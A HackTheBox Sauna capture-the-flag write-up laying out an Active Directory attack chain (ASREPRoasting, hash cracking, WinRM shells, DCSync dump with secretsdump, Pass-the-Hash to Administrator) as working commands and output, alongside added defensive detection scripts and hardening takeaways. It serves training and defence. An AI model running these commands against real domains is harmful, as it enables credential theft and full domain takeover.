
📋 This writeup is part of the Lainkusanagi OSCP Like List — a curated collection of machines recommended for OSCP preparation.
TL;DR
Sauna is an Easy Windows Domain Controller from HackTheBox that walks through a realistic Active Directory attack chain. Staff names scraped from a public-facing website are converted into a username list, enabling an ASREPRoasting attack against an account with Kerberos pre-authentication disabled. After cracking the hash and gaining a WinRM shell, WinPEAS uncovers plaintext AutoLogon credentials for a second account. BloodHound then reveals that this account holds DCSync rights, allowing a full domain credential dump and a Pass-the-Hash shell as Administrator.
Tools used: Nmap · Gobuster · Impacket (GetNPUsers, secretsdump) · Hashcat · CrackMapExec · Evil-WinRM · WinPEAS · BloodHound · bloodhound-python
Introduction
Sauna is a retired Easy-difficulty Windows machine on HackTheBox that simulates the Egotistical Bank domain. It’s an excellent introduction to Active Directory offensive techniques, covering OSINT-driven username enumeration, ASREPRoasting, Windows credential exposure via registry AutoLogon, and DCSync — a chain of attacks that mirrors real-world AD compromises almost step for step.
Machine: Sauna
OS: Windows Server 2019
Difficulty: Easy
Domain: EGOTISTICAL-BANK.LOCAL
IP: 10.129.95.180
Enumeration
Port Scanning
nmap -sCV --min-rate=5000 -A 10.129.95.180 -oN scans/nmapinitial.txt -v
Key ports identified — classic Domain Controller fingerprint:
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0 → Egotistical Bank
88/tcp open kerberos Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap EGOTISTICAL-BANK.LOCAL
445/tcp open microsoft-ds
636/tcp open tcpwrapped
3268/tcp open ldap EGOTISTICAL-BANK.LOCAL
The presence of Kerberos (88) and LDAP (389) confirms a Domain Controller. The HTTP server on port 80 is interesting — most DCs don’t run a public website.
Web Enumeration
Visiting http://10.129.95.180 reveals a corporate banking website for Egotistical Bank. A Gobuster scan finds no hidden directories of interest, but browsing the site manually turns up something more valuable — a team page listing employee full names:
- Fergus Smith
- Shaun Coins
- Hugo Bear
- Bowie Taylor
- Sophie Driver
- Steven Kerb
In Active Directory environments, usernames are commonly derived from full names using predictable formats: fsmith, f.smith, fergus.smith, fergussmith. Building a wordlist from these names and testing common AD username formats gives a solid base for the next step.
Initial Foothold
ASREPRoasting — No Password Needed
ASREPRoasting targets accounts that have Kerberos pre-authentication disabled. Normally a client must prove knowledge of its password before the KDC will issue a ticket. When pre-auth is disabled, the KDC hands back an AS-REP for that user to anyone who asks; part of that reply is encrypted with a key derived from the user's password, so it can be cracked offline with no authentication at all.
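The attribute GetNPUsers keys on is the DONT_REQ_PREAUTH bit (0x400000) of userAccountControl, so the defender-side check is a decode of that same attribute. The script below is an added example, not part of the original writeup: SAMPLE_ACCOUNTS is a constructed stand-in for an LDAP export of sAMAccountName and userAccountControl (the account names echo the writeup's domain, the attribute values are made up), and in a real audit you would pull those two attributes from the directory instead.

```python
"""Flag AD accounts whose userAccountControl has DONT_REQ_PREAUTH set.

Added example, not from the original writeup. SAMPLE_ACCOUNTS is a
constructed stand-in for an LDAP export; in production the same two
attributes would be read from the directory.
"""

# userAccountControl bit flags relevant here (values from Microsoft's docs)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000

FLAG_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}

# Constructed sample export (sAMAccountName, userAccountControl).
SAMPLE_ACCOUNTS = [
    ("Administrator", 0x10200),  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("fsmith", 0x400200),        # NORMAL_ACCOUNT | DONT_REQ_PREAUTH: exposed
    ("hsmith", 0x200),
    ("svc_loanmgr", 0x10200),
    ("old_vendor", 0x400202),    # DONT_REQ_PREAUTH but ACCOUNTDISABLE set
]


def decode_uac(value: int) -> list[str]:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if value & bit]


def asrep_exposed(accounts, include_disabled: bool = False) -> list[str]:
    """Return the accounts a KDC would answer without pre-authentication.

    Disabled accounts are skipped by default: the KDC refuses them, so they
    are a hygiene finding rather than a live exposure.
    """
    exposed = []
    for sam, uac in accounts:
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        exposed.append(sam)
    return exposed


if __name__ == "__main__":
    lookup = dict(SAMPLE_ACCOUNTS)
    for sam in asrep_exposed(SAMPLE_ACCOUNTS, include_disabled=True):
        print(f"[!] {sam}: {', '.join(decode_uac(lookup[sam]))}")
```

Running it against the constructed export reports fsmith as live-exposed and old_vendor only when disabled accounts are included; the fix for any hit is to clear the flag (and rotate the password, since a prior AS-REP may already have been captured).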
Using impacket-GetNPUsers with the username list against the domain:
impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -format hashcat \
-usersfile users.txt -dc-ip 10.129.95.180
Most users return KDC_ERR_C_PRINCIPAL_UNKNOWN, but one hits:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:[AS-REP HASH]
fsmith (Fergus Smith) has pre-authentication disabled. The AS-REP hash is saved to a file for offline cracking.
Cracking the AS-REP Hash
hashcat fsmith.hash -m 18200 /usr/share/wordlists/rockyou.txt
[PASSWORD] (fsmith)
Status: Cracked
Credentials obtained: fsmith:[PASSWORD]
Gaining a Shell via WinRM
Validating the credentials with CrackMapExec:
cme winrm 10.129.95.180 -u fsmith -p '[PASSWORD]'
[+] EGOTISTICAL-BANK.LOCAL\fsmith:[PASSWORD] (Pwn3d!)
Logging in with Evil-WinRM:
evil-winrm -u fsmith -p '[PASSWORD]' -i 10.129.95.180
*Evil-WinRM* PS C:\Users\FSmith\Documents> type C:\Users\FSmith\Desktop\user.txt
[USER FLAG]
Privilege Escalation
WinPEAS — AutoLogon Credentials in the Registry
With a foothold as fsmith, WinPEAS is uploaded to C:\temp and executed for local privilege escalation enumeration. Most checks return access denied, but one section stands out — AutoLogon credentials stored in the registry:
Looking for AutoLogon credentials
Some AutoLogon credentials were found!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : [PASSWORD]
The username stored is svc_loanmanager — but running net users on the box shows the actual account name is svc_loanmgr. Testing with CrackMapExec:
cme winrm 10.129.95.180 -u svc_loanmgr -p '[PASSWORD]'
[+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:[PASSWORD] (Pwn3d!)
A second WinRM-capable account. Now to understand what privileges it holds.
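WinPEAS is reading the Winlogon key described above; a defender can sweep the same key across a fleet with `reg query` and parse the result. The script below is an added example and not the writeup's or WinPEAS's code: SAMPLE_OUTPUT is constructed to look like `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"` output (the password value is a placeholder), and the findings it returns mirror the exposure the writeup found, including the stored username that does not match the real account name.

```python
r"""Audit Winlogon AutoLogon settings from `reg query` output.

Added example, not from the original writeup. SAMPLE_OUTPUT is a constructed
imitation of:
    reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
The password value is a placeholder.
"""
import re

# A reg query value line: "    Name    REG_TYPE    data" (data may be empty)
VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s*(?P<data>.*)$")

SAMPLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DefaultPassword    REG_SZ    [PASSWORD]
    Shell    REG_SZ    explorer.exe
"""


def parse_reg_query(text: str) -> dict[str, str]:
    """Return {value name: data} for every REG_* line in reg query output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m.group("name")] = m.group("data").strip()
    return values


def autologon_findings(values: dict[str, str]) -> list[str]:
    """Describe the AutoLogon exposure, if any, in parsed Winlogon values."""
    findings = []
    enabled = values.get("AutoAdminLogon") == "1"
    password = values.get("DefaultPassword", "")
    # Reported verbatim: the stored name may not match the real account
    user = values.get("DefaultUserName", "<unset>")
    domain = values.get("DefaultDomainName", "")
    if enabled:
        findings.append("AutoAdminLogon is enabled")
    if password:
        findings.append(f"DefaultPassword is stored in plaintext for {user}")
    elif enabled:
        findings.append("AutoAdminLogon is enabled but DefaultPassword is absent: "
                        "the password is probably in the DefaultPassword LSA secret")
    if password and domain and domain != ".":
        findings.append(f"AutoLogon account is a domain account in {domain}")
    return findings


if __name__ == "__main__":
    for finding in autologon_findings(parse_reg_query(SAMPLE_OUTPUT)):
        print(f"[!] {finding}")
```

The LSA-secret branch matters in practice: removing the DefaultPassword value while leaving AutoAdminLogon on does not remove the credential, it only moves it where SYSTEM-level tooling can still read it. The clean remediation is to disable AutoAdminLogon, delete the stored password, and rotate the account.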
BloodHound — Discovering DCSync Rights
Running bloodhound-python to collect AD data for BloodHound analysis:
bloodhound-python -c ALL -u svc_loanmgr -p '[PASSWORD]' \
-ns 10.129.95.180 -d EGOTISTICAL-BANK.LOCAL
Loading the collected data into BloodHound reveals a critical path: svc_loanmgr has the DS-Replication-Get-Changes-All extended right on the domain object — in other words, full DCSync privileges.
DCSync lets any account holding this right impersonate a Domain Controller and request password hashes for any user in the domain, including the Administrator, over the directory replication protocol. The secrets are the same ones NTDS.DIT holds, but the attacker never has to read that file from the DC's disk.
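Because the request goes over the replication protocol, the Domain Controller records it as a Security event 4662 (Control Access on the domain object) whose Properties field lists the replication-right GUIDs; that is the signal a defender hunts for, since a replication request from anything other than a DC is the secretsdump step in progress. The script below is an added example, not the writeup's own tooling: SAMPLE_EVENTS is a constructed stand-in for 4662 records exported from a SIEM, the three replication GUIDs and the domainDNS class GUID are the real identifiers, the account names follow the writeup's domain, and the non-replication GUID in the third event is made up.

```python
"""Flag DCSync-style replication requests in Security event 4662 records.

Added example, not from the original writeup. SAMPLE_EVENTS is constructed;
the replication-right GUIDs are the real extended-right identifiers.
"""
import re

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Control-access rights whose use against the domain object means replication
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts expected to replicate: DC computer accounts, plus any legitimate
# replication service (e.g. a directory sync agent) you add deliberately.
KNOWN_REPLICATORS = {"SAUNA$"}

DOMAIN_OBJECT = "DC=EGOTISTICAL-BANK,DC=LOCAL"

SAMPLE_EVENTS = [
    {   # the DC's own replication traffic: expected, allowlisted
        "event_id": 4662, "account": "SAUNA$", "access_mask": "0x100",
        "object_name": DOMAIN_OBJECT,
        "properties": "Control Access\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                      "{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # a service account asking for every secret: the DCSync step
        "event_id": 4662, "account": "svc_loanmgr", "access_mask": "0x100",
        "object_name": DOMAIN_OBJECT,
        "properties": "Control Access\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                      "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
                      "{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # routine 4662 on a user object, constructed non-replication GUID: ignore
        "event_id": 4662, "account": "fsmith", "access_mask": "0x10",
        "object_name": "CN=FSmith,CN=Users," + DOMAIN_OBJECT,
        "properties": "Write Property\n{deadbeef-0000-4000-8000-000000000001}",
    },
    {   # a logon event: wrong event ID, ignored
        "event_id": 4624, "account": "fsmith", "access_mask": "",
        "object_name": "", "properties": "",
    },
]


def replication_rights_used(properties: str) -> list[str]:
    """Map the GUIDs in a 4662 Properties field to replication right names."""
    names = [REPLICATION_RIGHTS[g.lower()]
             for g in GUID_RE.findall(properties)
             if g.lower() in REPLICATION_RIGHTS]
    return sorted(names)


def detect_dcsync(events) -> list[dict]:
    """Return an alert for every replication request by a non-DC account."""
    alerts = []
    for ev in events:
        # 0x100 is the Control Access mask under which extended rights appear
        if ev.get("event_id") != 4662 or ev.get("access_mask") != "0x100":
            continue
        rights = replication_rights_used(ev.get("properties", ""))
        if not rights or ev["account"] in KNOWN_REPLICATORS:
            continue
        alerts.append({"account": ev["account"],
                       "object": ev["object_name"],
                       "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print(f"[!] DCSync-style request by {alert['account']} "
              f"on {alert['object']}: {', '.join(alert['rights'])}")
```

Two caveats when deploying this: 4662 is only written when the Directory Service Access audit subcategory is enabled on the DCs, and the allowlist should be derived from the Domain Controllers OU rather than maintained by hand, otherwise a newly promoted DC generates false positives and a stale entry hides a real one.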
DCSync — Dumping All Domain Hashes
impacket-secretsdump 'svc_loanmgr:[PASSWORD]'@10.129.95.180
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:[NTLM HASH]
Guest:501:[NTLM HASH]
krbtgt:502:[NTLM HASH]
EGOTISTICAL-BANK.LOCAL\HSmith:1103:[NTLM HASH]
EGOTISTICAL-BANK.LOCAL\FSmith:1105:[NTLM HASH]
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:[NTLM HASH]
SAUNA$:1000:[NTLM HASH]
Every account hash in the domain — including Administrator — is now in hand.
Pass-the-Hash — Getting Administrator
NTLM hashes can be used directly for authentication without cracking them first. Evil-WinRM supports Pass-the-Hash natively:
evil-winrm -u Administrator -H '[NTLM HASH]' -i 10.129.95.180
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
Grabbing the Root Flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
[ROOT FLAG]
Key Takeaways
1. Employee names on public websites are OSINT gold. The team page gave us a working username on the first try. In a real engagement, scraping LinkedIn, company websites, and email signatures is often the fastest path to a valid domain account list.
2. Kerberos pre-authentication should always be required. Disabling it for any account exposes that account to offline hash cracking with no authentication needed. If a legacy application requires pre-auth disabled, the account’s password must be long and complex enough to resist dictionary attacks.
3. AutoLogon credentials in the registry are a critical exposure. Windows stores AutoLogon credentials in plaintext under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. Any user who can read the registry — which WinPEAS does trivially — can retrieve them. AutoLogon should never be used on domain-joined machines, especially in environments with sensitive accounts.
4. DCSync is a game over condition. Any account holding DS-Replication-Get-Changes-All can dump every hash in the domain silently and remotely. BloodHound makes finding these misconfigurations trivial. Audit replication rights regularly and ensure only legitimate domain controllers hold them.
5. Pass-the-Hash eliminates the need to crack strong passwords. Even if the Administrator’s hash couldn’t be cracked, NTLM hashes are directly usable for authentication. This is why password rotation alone isn’t sufficient — the underlying authentication protocol needs to be hardened or hashes protected.
Thanks for reading! Follow for more HackTheBox writeups covering Active Directory and Windows exploitation techniques.
HackTheBox — Sauna (Easy Windows / Active Directory) was originally published in System Weakness on Medium.